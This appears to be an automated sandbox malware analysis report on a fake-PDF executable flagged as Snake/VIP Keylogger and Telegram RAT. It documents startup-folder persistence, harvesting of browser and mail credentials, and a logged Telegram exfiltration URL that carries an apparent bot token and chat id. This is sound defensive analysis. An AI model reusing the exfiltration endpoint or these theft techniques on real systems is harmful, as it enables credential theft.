Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation

Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 7088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: audiomaximizer.exe PID: 7556, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: audiomaximizer.exe PID: 7556, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 7088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: audiomaximizer.exe PID: 7556, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 7088, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: audiomaximizer.exe PID: 7556, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: audiomaximizer.exe PID: 7556, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	23 System Information Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 PowerShell	12 Registry Run Keys / Startup Folder	11 Process Injection	3 Obfuscated Files or Information	LSASS Memory	1 Query Registry	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	12 Registry Run Keys / Startup Folder	1 Software Packing	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	41 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PDF-3093900299039 pdf.exe	64%	Virustotal		Browse
PDF-3093900299039 pdf.exe	53%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
PDF-3093900299039 pdf.exe	100%	Avira	HEUR/AGEN.1309800
PDF-3093900299039 pdf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	100%	Avira	HEUR/AGEN.1309800
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe	64%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.32.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U/sendDocument?chat_id=7437481970&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery	false	high
http://checkip.dyndns.org/	false	high
